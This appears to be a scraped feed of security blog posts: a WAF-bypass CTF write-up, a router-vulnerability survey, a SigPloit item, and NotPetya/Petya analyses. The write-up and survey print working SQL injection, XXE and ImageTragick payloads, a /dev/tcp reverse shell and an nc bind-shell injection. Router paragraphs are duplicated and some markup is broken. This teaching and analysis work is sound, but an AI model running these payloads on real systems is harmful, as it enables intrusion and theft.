Participants found a flaw in our ANTLR parser for MySQL. The reason is that MySQL supports conditional comments using the notation /*! … */. Everything inside such a comment will be run by MySQL, but other databases will ignore it.
http://task1.waf-bypass.phdays.com/post.php?p=(select /*!50718 ST_LatFromGeoHash((SELECT table_name FROm information_schema.tables LIMIT 1)) */) and true and true and true order by id desc limit 10 -- (Arseny Sharoglazov)
http://task1.waf-bypass.phdays.com/post.php?p=/*!1111111 union select 1 id,flag,1,1 from flags where 1*/ (Sergey Bobrov)
Challenge #2 (KM)
250 pointsFor the second challenge, participants had access to an application that allowed adding notes. The full SQL query was passed in hex in parameter p:
http://task2.waf-bypass.phdays.com/notes.php?q=53454c454354207469746c652c20626f64792046524f4d206e6f746573204c494d4954203235 (SELECT title, body FROM notes LIMIT 25 )
In the ALFAScript language, wet set an attribute-based access control (ABAC) policy allowing users to perform only INSERT, UPDATE and SELECT for the notes table only. Therefore, access to the flags table was blocked. But we left a way around this restriction by allowing CREATE. Our intended solution involved creating an event (https://dev.mysql.com/doc/refman/5.7/en/create-event.html) that writes a flag to the notes table:
CREATE EVENT `new_event` ON SCHEDULE EVERY 60 SECOND STARTS CURRENT_TIMESTAMP ON COMPLETION NOT PRESERVE ENABLE COMMENT '' DO insert into notes (title, body) VALUES ((select flag from flags limit 1), 2)
Besides CREATE EVENT, participants could use CREATE TABLE to get a flag in a MySQL message after first causing an error (solution by Arseny Sharoglazov):
CREATE TABLE ggg AS SELECT ST_LongFromGeoHash (flag) FROM flags;
Sergey Bobrov proposed an alternative method using ON DUPLICATE KEY UPDATE, which enables running UPDATE inside INSERT with a single query:
INSERT INTO notes SELECT 1,2,3 FROM notes,flags as a ON DUPLICATE KEY UPDATE body = flag
Challenge #3 (AG)
300 pointsHere participants needed to find and exploit a vulnerability in an old version of Adobe BlazeDS. The application used AMF (Action Message Format) for communicating with the server. AMF is a serialized structure with typed fields. One type is XML (0x0b), incorrect parsing of which caused a number of vulnerabilities in libraries for handling AMF, including in BlazeDS.
WAF had a built-in AMF parser, but parsing of external Flex objects— AcknowledgeMessageExt (alias DSK), CommandMessageExt (DSC), AsyncMessageExt (DSA)—was disabled for this challenge. At the same time, BlazeDS could parse such messages and find XML in them, which led to a vulnerability to XXE attacks.
The following request could be created using the pyamf library:
import pyamf
import httplib
import uuid
from pyamf.flex.messaging import RemotingMessage, AcknowledgeMessageExt
from pyamf.remoting import Envelope, Request, decode
hostname = 'task3.waf-bypass.phdays.com'
port = 80
path = '/samples/messagebroker/amf'
request = AcknowledgeMessageExt(
operation="findEmployeesByName",
destination="runtime-employee-ro",
messageId=None,
body=[
'
' ]>'
'
clientId=None,
headers={'DSId': str(uuid.uuid4()).upper(),
'DSEndpoint': 'my-amf'}
)
envelope = Envelope(amfVersion=3)
envelope["/%d" % 1] = Request(u'null', [request])
message = pyamf.remoting.encode(envelope)
conn = httplib.HTTPConnection(hostname, port)
conn.request('POST', path, message.getvalue(),
headers={'Content-Type': 'application/x-amf'})
resp = conn.getresponse()
data = resp.read()
content = decode(data)
print content
BlazeDS was configured to operate via an internal transparent proxy, which added a flag to the header of all outgoing requests.
Challenge #4 (KP)
200 pointsFor this challenge, we used a version of web application Pasteboard that was vulnerable to the Imagetragick attack. WAF was specially configured to filter only the following keywords:
url, caption:, label:, ephemeral:, msl:
However, less-common vectors were still available. One for example, was the text wrapper (unlike label, no @ is required before the file name):
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'text:/etc/passwd'
pop graphic-context
The result was an image with the contents of the /etc/passwd file:
Arseny Sharoglazov used a vector with image over:
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
In the imagemagick source code, Sergey Bobrov found a pango: wrapper not previously mentioned in public exploits.
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'pango:@/etc/passwd'
pop graphic-context
Challenge #5 (GM)
250 pointsParticipants were given a search form vulnerable to SQL injection. The table with search results contained the publickey field. The challenge was to use SQL injection to get the value of the privatekey field. The following ABAC policy, written in ALFAScript, was used:
namespace example {
export policy Main {
target clause action == "select"
apply denyUnlessPermit
rule r1 {
permit
target clause resource.schema.id == "information_schema"
}
rule r2 {
permit
target clause resource.schema.id == "task5"
and resource.table.id == "users"
and resource.column.id == "publickey"
}
rule r3 {
permit
target clause resource.schema.id == "task5"
and resource.table.id == "users"
and resource.column.id == "name"
}
}
}
Note use of the word denyUnlessPermit. In XACML, there are several types of algorithms for combining elements to describe attribute-based access control policies. Use of the denyUnlessPermit algorithm means that the query will be authorized if and only if at least one of the rules allows granting user access to the resource. The DBFW does not know the real structure of the database, so when it sees a query of the type SELECT a,b from c,d, unlike the database it does not know where column a is located (in table c or table d). In case of such a query, the DBFW must check the user's ability to access all versions of resources. In this example, that would be columns c.a, c.b, d.a, and d.b. So if a query contains at least one authorized column, we can use two tables to extract privatekey:
Petrov' union select name, privatekey from information_schema.columns,users where name = 'Petrov' –
Challenge #6 (ES)
300 pointsThis web application had two functions: loading of CSV files with contact lists and a form for searching contacts, which was vulnerable to SQL injection. A special Dejector mechanism was used by the DBFW for protection.
This method for detecting SQL injection was first detailed by Hansen and Patterson in "Guns and Butter: Towards Formal Axioms of Input Validation". In essence, a set of known web application requests (for example, this set could be obtained using static source-code analysis) is used to build an SQL subgrammar. This grammar is used to generate a parser. If a query is recognized by the parser, this mean that the query belongs to that language; otherwise the query does not belong to the language and is therefore not legitimate.
For this challenge, we prepared a grammar describing the allowed queries. The ability to load CSV files implied that the MySQL user had file operations available. Another hint was in an error: mysqli_multi_query(), enabling stacked queries, was used. The ordinary LOAD_FILE() was forbidden by the grammar but LOAD DATA INFILE was accessible:
'; load data infile '/etc/passwd' into table users character set 'utf8
Winners
First and second place were taken by Sergey Bobrov and Arseny Sharoglazov, both from Kaspersky Lab. Third place went to Andrey Semakin, a student at Tyumen State University. Great work!
Arseny Reutov, Dmitry Nagibin, Igor Kanygin, Denis Kolegov, Nikolay Tkachenko, Ivan Khudyashov
↧
Practical ways to misuse a router
Wi-Fi and 3G routers are all around us. Yet in just one recent month, approximately 10 root shell and administrator account vulnerabilities in home internet devices came to light. And access to tens of millions of IoT devices—routers, webcams, and other gadgets—is available to anyone willing to pay $50 for a shodan.io paid account.
At the same time, developers and vendors of these devices tend to have other priorities than "testing" and "security." Many serious vulnerabilities remain unpatched, and even when patches are released, users are slow to install them. What does this leave us with? Legions of vulnerable devices, lying low until hacked and pressed into service as part of a DDoS botnet.
The Mirai botnet burst onto the world scene in August 2016. MalwareMustDie researchers started to study the malicious network activity of IoT devices in early August, and by September 20, the botnet had grown to approximately 150,000 devices (primarily DVRs and IP cameras) and attacked Minecraft servers hosted by French provider OVH.
IoT devices were infected by attacks on Telnet ports 23 or 2323 using a list of 62 standard passwords. IP addresses were generated completely randomly throughout the entire numbering space; after connecting to the network, each infected device started scanning for these random addresses. The botnet code was not stored in long-term memory and therefore did not survive a restart of the infected device. But considering the speed at which the bots scanned the internet, after a restart the previously infected device would soon rejoin the botnet anyway.
This was followed by massive DDoS attacks on journalist Brian Krebs, DynDNS, Liberia, Deutsche Telekom, and a U.S. college. The Mirai source code was published in early October. The attack on Deutsche Telekom two months later used a modified version of Mirai that exploited a vulnerability in the RomPager server on port 7547 (CWMP protocol).
As claimed by the person who published the Mirai code, the botnet encompassed 380,000 devices simultaneously. The sheer scale of infection was made possible by negligence, of course—externally accessible Telnet and the failure to require non-factory-set passwords were key enablers of the botnet's growth.
Attempts to fight back against these attacks are slowly but surely reducing the number of compromised devices with non-unique passwords. Attackers' methods are changing from password-guessing to exploitation of various vulnerabilities.
The Mirai preyed primarily on video cameras and other IoT devices on which Telnet gives access to Linux commands; but on routers, Telnet gave access only to the command-line interface (CLI) for configuration. The CLI allows reading and modifying the device configuration, DNS settings, IP routing, and system information—which is already enough for some attacks, but not enough to install software for remote control.
Here is what we'll charitably call "cute" protection from bots that can be found on port 23 of some routers:
But the absence of bash terminals does not mean that other attack vectors are absent.
So what is your run-of-the-mill home router? It's a package containing:
The average age of device firmware is 3–4 years. This age correlates with the average age of routers themselves—in other words, users buy new routers sooner than they update the firmware on their existing ones. Recently an encouraging trend in the direction of improvement has been seen, thanks to providers that remotely (and without user intervention) are able to diagnose, configure, and roll out updates to user routers. One limitation, though, is that this works only for devices put out under the providers' own brands.
Based on field experience, passwords for approximately 15 out of 100 devices have never been changed from their default values. And just the five most popular user name/password pairs are enough to get admin access to 1 out of every 10 devices:
Having obtained access to a web panel, an attacker can make life difficult for all of the network users, perform DNS spoofing, and probe the internal network. If lucky, the attacker can also run ping or traceroute from the web panel, find vulnerabilities in the web server code in order to obtain shell access, or use an already-found vulnerability.
The diversity and simplicity of vulnerabilities (not to mention number of bug reports) existing in router software is clear sign that device functionality is rarely subjected to rigorous testing, and that developers do not have the know-how to create secure software. Development does not take intruder models into account. Buyers can walk out of a store today with a router containing one of the following vulnerabilities:
● NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' RCE (link). Due to insufficient checks in ping.cgi, user-entered IP addresses are piped directly into bash. Therefore, arbitrary commands can be run in the terminal by appending these commands in the IP address field of a POST request. For example: 12.12.12.12; nc -l 4444 -e /bin/bash. Of course, "nc" can be turned into a more powerful payload, such as msfvenom. 3,000 devices are awaiting their hour of reckoning. Exploiting this vulnerability requires authorization in the web interface.
● Multiple vulnerabilities in GoAhead WIFICAM cameras (link). A number of vulnerabilities were found in over 1,250 models of IP cameras, placing approximately 150,000 cameras at risk. An error in implementation of a custom authorization mechanism allows obtaining the administrator password; in addition, an OS Command Injection vulnerability in set_ftp.cgi allows running any and all terminal commands. Together, these give full unrestricted control over the device. Yikes!
This vulnerability was added to the arsenal of the TheMoon botnet, which was first spotted in 2014. Research identified infected cameras on which the settings.ini file had been modified to contain a script that loads malicious code from the attacker's server when the device is started.
A series of downloads from the attacker's server is concluded with an ARM-compiled executable:
which is identified by 18 out of 57 antivirus products as Linux/Proxy.
● Linksys Smart Wi-Fi Vulnerabilities (link). Security analysis of 25 popular Linksys Smart Wi-Fi routers sold worldwide led to identification of 10 vulnerabilities of various types and danger levels. Some of the vulnerabilities allow running arbitrary commands with root privileges. Although Shodan shows only a total of 1,000 such devices, researchers have described scanning over 7,000 devices.
● Siklu EtherHaul Unauthenticated Remote Command Execution Vulnerability (<7 .4.0="" a="" href="http://seclists.org/fulldisclosure/2017/Feb/53">link7>
). These high-end millimeter wave radios from Siklu provide subscriber connectivity at 70/80/GHz. A researcher found that the mysterious port 555 is used to communicate with other Siklu EH devices. But since access to the port is not restricted and passwords are stored in cleartext, the researcher chanced upon an exploit that can change the administrator password. This architecture-level defect was assigned a CVE number: CVE-2017-7318.At the same time, developers and vendors of these devices tend to have other priorities than "testing" and "security." Many serious vulnerabilities remain unpatched, and even when patches are released, users are slow to install them. What does this leave us with? Legions of vulnerable devices, lying low until hacked and pressed into service as part of a DDoS botnet.
What's changed?
The Mirai botnet burst onto the world scene in August 2016. MalwareMustDie researchers started to study the malicious network activity of IoT devices in early August, and by September 20, the botnet had grown to approximately 150,000 devices (primarily DVRs and IP cameras) and attacked Minecraft servers hosted by French provider OVH.
IoT devices were infected by attacks on Telnet ports 23 or 2323 using a list of 62 standard passwords. IP addresses were generated completely randomly throughout the entire numbering space; after connecting to the network, each infected device started scanning for these random addresses. The botnet code was not stored in long-term memory and therefore did not survive a restart of the infected device. But considering the speed at which the bots scanned the internet, after a restart the previously infected device would soon rejoin the botnet anyway.
This was followed by massive DDoS attacks on journalist Brian Krebs, DynDNS, Liberia, Deutsche Telekom, and a U.S. college. The Mirai source code was published in early October. The attack on Deutsche Telekom two months later used a modified version of Mirai that exploited a vulnerability in the RomPager server on port 7547 (CWMP protocol).
As claimed by the person who published the Mirai code, the botnet encompassed 380,000 devices simultaneously. The sheer scale of infection was made possible by negligence, of course—externally accessible Telnet and the failure to require non-factory-set passwords were key enablers of the botnet's growth.
More than just cameras
Attempts to fight back against these attacks are slowly but surely reducing the number of compromised devices with non-unique passwords. Attackers' methods are changing from password-guessing to exploitation of various vulnerabilities.
The Mirai preyed primarily on video cameras and other IoT devices on which Telnet gives access to Linux commands; but on routers, Telnet gave access only to the command-line interface (CLI) for configuration. The CLI allows reading and modifying the device configuration, DNS settings, IP routing, and system information—which is already enough for some attacks, but not enough to install software for remote control.
Here is what we'll charitably call "cute" protection from bots that can be found on port 23 of some routers:
But the absence of bash terminals does not mean that other attack vectors are absent.
So what is your run-of-the-mill home router? It's a package containing:
- Externally accessible web panel with a flashy design
- Read-only squashfs file system and ~10 MB of flash memory
- Busybox (compact UNIX command-line interface with utilities), almost inevitably
- micro http web server, DropBear SSH server
- Open ports: 80, 443, 23, 22, 21, 137
The average age of device firmware is 3–4 years. This age correlates with the average age of routers themselves—in other words, users buy new routers sooner than they update the firmware on their existing ones. Recently an encouraging trend in the direction of improvement has been seen, thanks to providers that remotely (and without user intervention) are able to diagnose, configure, and roll out updates to user routers. One limitation, though, is that this works only for devices put out under the providers' own brands.
Based on field experience, passwords for approximately 15 out of 100 devices have never been changed from their default values. And just the five most popular user name/password pairs are enough to get admin access to 1 out of every 10 devices:
Having obtained access to a web panel, an attacker can make life difficult for all of the network users, perform DNS spoofing, and probe the internal network. If lucky, the attacker can also run ping or traceroute from the web panel, find vulnerabilities in the web server code in order to obtain shell access, or use an already-found vulnerability.
The diversity and simplicity of vulnerabilities (not to mention number of bug reports) existing in router software is clear sign that device functionality is rarely subjected to rigorous testing, and that developers do not have the know-how to create secure software. Development does not take intruder models into account. Buyers can walk out of a store today with a router containing one of the following vulnerabilities:
● NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' RCE (link). Due to insufficient checks in ping.cgi, user-entered IP addresses are piped directly into bash. Therefore, arbitrary commands can be run in the terminal by appending these commands in the IP address field of a POST request. For example: 12.12.12.12; nc -l 4444 -e /bin/bash. Of course, "nc" can be turned into a more powerful payload, such as msfvenom. 3,000 devices are awaiting their hour of reckoning. Exploiting this vulnerability requires authorization in the web interface.
● Multiple vulnerabilities in GoAhead WIFICAM cameras (link). A number of vulnerabilities were found in over 1,250 models of IP cameras, placing approximately 150,000 cameras at risk. An error in implementation of a custom authorization mechanism allows obtaining the administrator password; in addition, an OS Command Injection vulnerability in set_ftp.cgi allows running any and all terminal commands. Together, these give full unrestricted control over the device. Yikes!
This vulnerability was added to the arsenal of the TheMoon botnet, which was first spotted in 2014. Research identified infected cameras on which the settings.ini file had been modified to contain a script that loads malicious code from the attacker's server when the device is started.
A series of downloads from the attacker's server is concluded with an ARM-compiled executable:
which is identified by 18 out of 57 antivirus products as Linux/Proxy.
● Linksys Smart Wi-Fi Vulnerabilities (link). Security analysis of 25 popular Linksys Smart Wi-Fi routers sold worldwide led to identification of 10 vulnerabilities of various types and danger levels. Some of the vulnerabilities allow running arbitrary commands with root privileges. Although Shodan shows only a total of 1,000 such devices, researchers have described scanning over 7,000 devices.
● Siklu EtherHaul Unauthenticated Remote Command Execution Vulnerability (<7 .4.0="" a="" href="http://seclists.org/fulldisclosure/2017/Feb/53">link7>
● Bypassing Authentication on iBall Baton Routers (link). Although the administrator interface for the iBall Baton 150M is secured by HTTP authorization, anyone at all can view password.cgi. It would seem that the developers forgot about this fact and stored passwords for all three of the device accounts in cleartext in a script on an HTML page. 2,500 administrator passwords are out there for the taking!
These examples all come from just one month. More thorough compendiums of router-related vulnerabilities are available from routersecurity.org and as part of the excellent routersploit framework, which collect dozens of vulnerabilities and exploits in convenient form.
To summarize: An enormous number of holes in web administration code make it possible to obtain passwords and run arbitrary code.
Other threat vectors
Besides a web interface, the average router has four to five ports open, including Telnet (23), SSH (22), and FTP (21).
In practice, Telnet gives access to the CLI for router settings and FTP enables updating router firmware remotely. For instance, on 18,000 D-Link DSL 2750U modems, anyone bruteforcing accounts can install firmware with a built-in backdoor. So an attacker can take control in a way that is resistant to restarting and unlikely to be reversed by another attacker. Here is what that attacker would do:
- Download device firmware from the device manufacturer (D-Link).
- Extract the firmware archive.
- Alter the firmware by adding a backdoor account or script that runs bind shell. Here the attacker can use a bit of imagination when choosing one of the many methods for getting shell access.
- Reassemble this franken-firmware. Tools for this purpose include the firmware framework.
- Update the device firmware via FTP.
Besides FTP, D-Link devices can also be updated via Telnet (160,000 CLIs available) or web panel. Compared to this, the DNS Hijack threat looks like peanuts!
Recent attacks on Eir D1000 devices involved an OS Command Injection vulnerability in the TR-064 implementation of CWMP. This resulted in infection of around 900,000 devices with a modified version of Mirai. Another vulnerability in RomPager server versions prior to 4.34, dubbed Misfortune Cookie (CVE-2014-9222), has a maximum CVSS 10 rating.
Meanwhile, just under half of all CWMP-enabled devices use the vulnerable RomPager 4.07. That's almost 3,300,000 internet-accessible devices. Check Point at RSA 2017 presented research on security issues with TR-064.
RomPager 4.07 is far from the only out-of-date service used by firmware developers. Genivia gSOAP 2.7 was released in 2004, while DropBear SSH 0.46 saw the light of day in 2005, yet both can be found on devices today.
Multiple vulnerabilities (DoS and Authenticated RCE) are known for DropBear.
On April 4, researchers Bertin Jose and Fernandez Ezequiel published a report on an SNMP agent issue affecting 18 vendors, 78 models, and over half a million devices. Anyone can obtain full read/write access to all values due to this bug. The SNMP agent simply fails to check the community string: any combination is accepted for authorization. Bearing the fashionable name of StringBleed, this vulnerability primarily affects cable modems although the researchers have found a similar vulnerability on other devices. The consequences are the same as if there were no authorization at all.
Last but not least, 9 out of 1,000 routers provide a free DNS server with recursion enabled by default. Exploitation of this feature is a long-known technique and will continue until router DNS stops responding to internet-originated queries by default.
Conclusion
Manufacturers of connected home devices are gradually closing off the most commonplace methods for botnet infection. Instead of simple bruteforcing, attackers have shifted their efforts to exploiting vulnerabilities, which give substantially better results. Non-stop scanning of the entire range of IP addresses enables attackers to find all vulnerable devices. A huge number of device models have vulnerabilities; some vulnerabilities are specific to a certain model, while others affect hundreds of thousands or millions of devices, turning devices into an pliable toy in the hands of an attacker.Methods for fighting botnet infection are simple—starting with the most important ones, they are:
- Restricting access by default from the internet to the administration panel, CLI, and FTP.
- Using the latest firmware versions.
- Requiring customers to use strong passwords.
- Limiting brute-force attempts.
The most popular devices are—because of their popularity—the most interesting for both attackers and researchers. Until security becomes a serious priority, rushed and incomplete development cycles will continue to result in vulnerable router software.
Author: Kirill Shipulin, Positive Technologies
↧
↧
SigPloit framework published: telecom vulnerability testing of SS7, GTP, Diameter, and SIP made easy
Code for the open-source SigPloit framework has been published on GitHub by security researcher Loay Abdelrazek. SigPloit is a convenient framework for testing for vulnerabilities in telecommunication protocols. We cannot say state that this project will have a big effect on the security situation, but this is definitely one of the alarm bells that should be noted by telecom industry.
What SigPloit does
As described on GitHub, SigPloit is a framework intended for telecom security specialists. Researchers can use SigPloit for penetration testing of telecom networks in order to find known vulnerabilities in signaling protocols.The stated purpose of the framework is security testing of all existing protocols that are used in telecom operators' infrastructure, including SS7, GTP (3G), Diameter (4G), and even SIP for IMS and VoLTE, which is used at the access level and for encapsulating SS7 messages in SIP-T. According to the documentation, SigPloit uses testing results to provide network-specific recommendations on how to improve security.
Consequences for telecom security
Telecom protocols often rely on "security through obscurity." In practice, security measures are often inadequate, but such issues are contained due to the small number of securityresearchers conversant in these niche protocols and infrastructures. Tools like SigPloit possibly bring some changes to this and can be easily modified to implement the full range of SS7 attacks.
Such publicly available pentesting tools dramatically reduce the barrier to entry for those interested in telecom security—both white hats and black hats. Attacks on operator infrastructure will become the province not only of experienced industry specialists, but even novices with basic knowledge of Linux, programming and networks.
If telecom operators fail to prioritize security, telecom users and their privacy will lose out.
Positive Technologies researchers have repeatedly raised the alarm about vulnerabilities in the SS7 signaling protocol. These attacks have long passed from the "proof of concept" stage to real threats that are being used against users in the wild. SS7 vulnerabilities have already been used to steal from user bank accounts as well as hack Telegram accounts.
Please refer to our latest research papers to be up to date with latest trends:
↧
The new malware that broke out today is slightly similar to Petya ransomware known since 2016
Positive Technologies experts are still analyzing the malware sample and gathering additional data—in particular, information on the mechanism of its intrusion into a network. But even at this point it is obviously not just a new version of WannaCry. This ransomware combines hacking techniques, such as standard utilities for system administration and tools for obtaining passwords to operating systems. This ensures fast spread of the malware within the network and causes a large-scale epidemic—if at least one computer is infected. As a result, the computer is out of operation and data are encrypted.
According to preliminary data, we can confirm that this malware is slightly similar to Petya, ransomwareknown since 2016 that also caused PC to crash.
Talking about the current situation, the problem is again in information security negligence. In short, affected organizations did not learn lessons after WannaCry. First of all, updates are not installed in time. According to Positive Technologies, 20% of systems have critical vulnerabilities associated with the lack of security updates. The average age of the most obsolete updates is 9 years, and the oldest discovered vulnerability was published more than 17 years ago.
The general level of staff awareness of information security is low. There are still cases when employees download attachments or follow links received from untrusted sources.
Another problem is that information systems are often configured incorrectly in terms of architecture.
It is harder to defend against this threat, compared to WannaCry, since it is also spreading with stolen legitimate credentials. In order to struggle against it, we recommend organizations to install security updates on time, implement information security monitoring, and perform regular security audits.
↧
#NotPetya and #Petya compared: any hope for decrypting files?
#NotPetya and #Petya compared: any hope for decrypting files?
Positive Technologies expert Dmitry Sklyarov provides here his comparison of NotPetya ransomware, which attacked companies this week, with a sample of Petya from 2016. Is decryption of ransomed files possible? And what does the code tell us about the malware's creation?
This post considers the portions of the two viruses responsible for MFT encryption. This encryption runs when the ransomware has administrator rights.
What NotPetya does
At the moment of infection (while Windows is still running), the virus writes code to the start of the disk. This code will be run after restart. The virus writes its configuration, verification data, and original MBR to certain sectors.
Let's start by looking at disk sector 0x20, which is something like a machine-specific configuration. During an infection, the following values are written to sector 0x20:
- Indicator that the MFT is not encrypted (value 0)
- EncryptionKey (random sequence 32 bytes long)
- Nonce (random sequence 8 bytes long)
- Personal Installation Key (random sequence of 60 characters from the following alphabet: 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz)
Random data is generated by the CryptGenRandom function, which is believed to be cryptographically strong.
512 bytes with the value 0x07 are written to sector 0x21.
A version of the original MBR, in which every byte has been XOR’ed with the value 0x07, is written to sector 0x22.
After the initial restart, the MFT is encrypted. Before this happens:
- Sector 0x20 is read
- MFT encryption indicator is set (value 1)
- EncryptionKey is copied to a temporary buffer
- The field with EncryptionKey is overwritten with null bytes
- Sector 0x20 is written to disk
- Sector 0x21 (all 0x07) is read
- Contents of that sector are encrypted using EncryptionKey + Nonce
- Sector 0x21 is written to disk
Then the MFT sectors are encrypted with the same EncryptionKey + Nonce. The code of the encryption algorithm strongly resembles the Salsa20 algorithm, but there are some differences. Instead of the constant "expand 32-byte k," the constant "-1nvalid s3ct-id" is used. So far I have not been able to repeat the results of encryption with a known key. Possibly the authors have made an error somewhere, which would seem to be confirmed by this post: https://twitter.com/kryptoslogic/status/880058211516260352
When everything is encrypted, the machine restarts again, and the ransomware appears on screen requesting the decryption key.
The key is supposed to be a 32-character string containing a combination of the following characters: 0123456789abcdef. This string is run through a function that accepts an arbitrary number of bytes as input, and outputs 32 bytes. Presumably this is the SPONGENT hash function (to be confirmed). Then the output is fed through the same function 128 times, which gives us EncryptionKey. To check whether the key is valid, an attempt is made to decrypt the contents of sector 0x21, and if the expected unencrypted text is found there (all 0x07), MFT decryption and MBR restoration are started.
Can the attacker decrypt user files?
In my view, the authors of NotPetya did not intend for files to be recoverable after receipt of payment. Here's why:
1. The Personal Installation Key, which needs to be given to the virus creators after paying the ransom, is not related in any way to EncryptionKey. Both keys are random data. One key does not tell us anything about the other key, unless the attackers have some special knowledge about the workings of CryptGenRandom. Alternatively, the authors are supposed to send both EncryptionKey + Personal Installation Key to their own server, but nobody has reported such activity (and I have not seen such indications in the code, although it cannot be ruled out).
2. If my guess about the SPONGENT hash function proves correct, the decryption key is supposed to be the output of the hash. In order to calculate a valid key, this hash would need to be reversed (129 times), which is impossible with today's technology.
3. The entropy of EncryptionKey is 32*8 == 256 bits. The entropy of the hex key (entered by the user) is 32*4 == 128 bits. Any operation can only reduce entropy. Therefore, 32 hexadecimal characters cannot give us 32 bytes with definite values.
Differences from Petya (sample dated January 9, 2016)
Petya did not want to infect my test machine. Maybe it requires a network connection or something else—in any case, I had to do a memory dump.
I have not managed to review the code that generates the sectors used in the MBR set by Petya, but I did look at screenshots and the code run after restart.
Differences:
1. Sectors 0x36–0x39 are used (compare to NotPetya: 0x20–0x23).
2. Most auxiliary functions (text display, sector read/write) are identical to Petya.
3. Petya contains a function and strings for displaying a skull-and-bones banner. NotPetya has a very similar function but it is probably never called, and the strings have been zeroed out.
4. The length of the Personal Installation Key is 90 characters (15 groups of 6 characters each) versus 60 in NotPetya. Using an alphabet of 58 characters, a maximum of 527 bits of information can be so conveyed (versus 351 in NotPetya).
5. The Petya dump shows strings secp256k1 and secp192k1, which might mean that the Personal Installation Key is derived from EncryptionKey, which is calculated using elliptic-curve cryptography.
6. The user-entered key to start decryption should be a 16-character string from the following alphabet: 123456789abcdefghijkmnopqrstuvwxABCDEFGHJKLMNPQRSTUVWX.
7. Nothing resembling SPONGENT (or any other hash) is found.
8. Salsa20 uses the original constant "expand 32-byte k." The code of the functions is nearly identical, and while the Petya code was likely generated by a compiler (optimization was applied to repeating characters), it seems that in NotPetya, the constants were simply replaced.
Petya:
NotPetya:
The evidence, in my view, suggests that another strain of Petya existed, and after replacing constants and strings, that it was used to create NotPetya.
Again, I do not believe that NotPetya was intended to support decryption of victims' files, while Petya did in fact have such functionality. Disk recovery may still be an option, however. Both viruses have similar errors in the implementation of encryption algorithms, which could make it possible to quickly brute-force an encryption key to recover all encrypted data. Back in 2016, researchers described a method for recovering Petya-encrypted data without paying a ransom.
↧
Recovering data from a disk encrypted by #NotPetya with Salsa20
Ransomware attacks are an alarming trend of 2017. There have been many such attacks, but the ones that made the headlines are WannaCry and NotPetya (also known as Petya, Petya.A, ExPetr, and other names). With lessons of the previous epidemic heeded, specialists across the globe promptly reacted to the new challenge and, in a matter of hours after the first computers became infected, began analyzing encrypted disks. As early as June 27, the first descriptions[1]of how NotPetya spreads and infects computers appeared. Even better, a vaccine[2]to prevent NotPetya infections was found.
If NotPetya is unable to obtain administrator privileges when running, it performs AES encryption of user files only and the operating system continues to work. Unfortunately, recovering user files in that case requires knowing the private RSA key (which is allegedly available for purchase on the Darknet for 100 bitcoins).
The below method for recovering data works only if NotPetya had administrator privileges and used the Salsa20 algorithm to encrypt the entire hard drive.
It turned out that the creators of NotPetya made an error in their implementation of the Salsa20 algorithm. Due to this error, half of the encryption key bytes were not used in any way. This reduction in key length from 256 to 128 bits, unfortunately, still does not leave any hope of decrypting data in a reasonable time.
However, certain peculiarities of how the Salsa20 algorithm was applied allow recovering data, no key necessary.
How Salsa20 works
Salsa20 is a synchronous stream cipher in which encryption generates a key-dependent keystream, and the bytes of this keystream are added to the bytes of plaintext using the XOR operation. For decryption, the procedure must be repeated.
For the keystream to be computed for any offset in the stream, the keystream generator s20_expand32() generates a 64-byte keystream array into which the following is mixed:
· 256 bits (32 bytes) of the encryption key
· 8 bytes of the nonce (number used once) random sequence
· 16 bytes of the sigma constant ("expand 32-byte k" or "-1nvalid s3ct-id")
· 64 bits (8 bytes) of the block number in the stream
It should be noted that the generated keystream fragments are always aligned to a border multiple of 64 bytes. For example, to encrypt 7 bytes starting at offset 100, we must find the block number that has the first byte (100/64 == 1), compute a keystream for this block, and use 7 bytes from it starting from the offset (100%64 == 36). If there are not enough bytes in the block, a keystream is generated for the next block, and so on.
While encrypting a single stream (a disk is regarded by NotPetya as one stream), neither the key nor nonce changes. Therefore, for each encrypted disk, the only variable that affects the keystream is the block number.
As designed by the creators of Salsa20, 264 blocks of 64 bytes each allow generating a keystream with a period of 270 ~ 1021 bytes. This is a fairly long period for almost any practical applications, and hard disks of this capacity will certainly not appear any time soon.
However, implementing all this was a bit more difficult.
Actual keystream period in NotPetya
Look at the prototype of the function s20_crypt32(); disk sectors are encrypted by calling this function.
enum s20_status_t s20_crypt32(uint8_t *key,
uint8_t nonce[static 8],
uint32_t si,
uint8_t *buf,
uint32_t buflen)
A byte offset in the stream is passed through the si (probably Stream Index) argument. And judging by the type of the argument, it is clear that it only contains 32 bits, rather than 64 bits. This value goes to the keystream after being divided by 64, so a maximum of 26 bits remains.
// Set the second-to-highest 4 bytes of n to the block number
s20_rev_littleendian(n+8, si / 64);
Highlighted in gray are the bytes that do not affect keystream generation due to an error in the implementation of the function s20_rev_littleendian(). So out of 26 bits of the block number, only 16 bits (bytes at offset 0x20-0x21) affect the keystream. Therefore, the maximum keystream period is 216=65,536 blocks of 64 bytes each—or 4 megabytes.
The volume of encrypted data on a hard drive is many times larger than 4 megabytes, so many different pieces of data are encrypted using the same keystream fragments. This fact allows implementing a trivial attack based on known plaintext.
Another error
The developers' errors do not end here. When the function s20_crypt32() is called, they pass... the number of the 512-byte sector instead of the offset value in bytes!
Sectors are usually encrypted in pairs (1,024 bytes per access), which means that the keystream used to encrypt two neighboring sector pairs is the same in 1,022 bytes (offset by 2 bytes).
Heuristics for Known Plaintext Attack
Modern versions of Windows use the NTFS file system, which employs a whole number of different structures; most of their fields are fairly predictable.
What's more, disks contain a great many files whose contents are also quite predictable (in whole or in part).
First 512 bytes of the keystream
To validate the encryption key, NotPetya encrypts sector 0x21, which contains predefined values (all bytes 0x07). This gives us 512 bytes of the keystream.
Recovering the keystream by MFT
NotPetya does not encrypt the first 16 MFT records (32 sectors) but encrypts all the others.
Each file record begins with the sequence "FILE" usually followed by bytes 30 00 03 00 (UpdateSequenceArrayOffset = 0x30, UpdateSequenceArrayLength = 3). Theoretically, these 4 bytes can have other values, but they are almost always the same for all file records within the same logical NTFS partition.
